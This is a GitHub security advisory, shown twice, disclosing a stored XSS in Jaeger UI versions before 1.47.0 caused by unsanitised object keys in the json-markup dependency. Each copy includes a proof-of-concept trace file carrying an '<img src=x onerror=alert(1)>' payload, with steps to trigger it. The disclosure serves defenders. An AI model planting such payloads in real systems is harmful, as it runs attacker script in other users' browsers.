Headline
GHSA-2w8w-qhg4-f78j: A stored XSS in jaeger UI might allow an attacker who controls a trace to perform arbitrary jaeger queries
Related UI vulnerability advisory: https://github.com/jaegertracing/jaeger-ui/security/advisories/GHSA-vv24-rm95-q56r
Summary
Jaeger UI is using the json-markup dependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus the KeyValuesTable is vulnerable to XSS.
Details
The vulnerable line is here: https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49
PoC
- Start a Jaeger UI
- Save the following trace as a file:
{
"data": [
{
"traceID": "076ef819cc06c45a",
"spans": [
{
"traceID": "076ef819cc06c45a",
"spanID": "076ef819cc06c45a",
"flags": 1,
"operationName": "and open 'attributes'",
"references": [],
"startTime": 1678196149232010,
"duration": 13485,
"tags": [
{
"key": "sampler.type",
"type": "string",
"value": "{\"<img src=x onerror=alert(1)>\":\"test\"}"
}
],
"logs": [],
"processID": "p1",
"warnings": null
}
],
"processes": {
"p1": {
"serviceName": "click here",
"tags": [
]
}
},
"warnings": null
}
],
"total": 0,
"limit": 0,
"offset": 0,
"errors": null
}
- Upload that trace to Jaeger UI in order to visualise it.
- Open the trace, open it’s span’s attributes.
- XSS should be fired.
Impact
This is a XSS on Jaeger UI. XSS can be used to run JavaScript.
- GitHub Advisory Database
- GitHub Reviewed
- GHSA-2w8w-qhg4-f78j
A stored XSS in jaeger UI might allow an attacker who controls a trace to perform arbitrary jaeger queries
Package
gomod github.com/jaegertracing/jaeger (Go)
Affected versions
< 1.47.0
Related UI vulnerability advisory: GHSA-vv24-rm95-q56r
Summary
Jaeger UI is using the json-markup dependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus the KeyValuesTable is vulnerable to XSS.
Details
The vulnerable line is here: https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49
PoC
- Start a Jaeger UI
- Save the following trace as a file:
{ "data": [ { "traceID": "076ef819cc06c45a", "spans": [ { "traceID": "076ef819cc06c45a", "spanID": "076ef819cc06c45a", "flags": 1, "operationName": "and open 'attributes’", "references": [], "startTime": 1678196149232010, "duration": 13485, "tags": [ { "key": "sampler.type", "type": "string", "value": “{\"<img src=x onerror=alert(1)>\":\"test\"}” } ], "logs": [], "processID": "p1", "warnings": null } ], "processes": { "p1": { "serviceName": "click here", "tags": [ ] } }, "warnings": null } ], "total": 0, "limit": 0, "offset": 0, "errors": null }
- Upload that trace to Jaeger UI in order to visualise it.
- Open the trace, open it’s span’s attributes.
- XSS should be fired.
Impact
This is a XSS on Jaeger UI. XSS can be used to run JavaScript.
References
- GHSA-vv24-rm95-q56r
- GHSA-2w8w-qhg4-f78j
- https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49
Published to the GitHub Advisory Database
Jul 11, 2023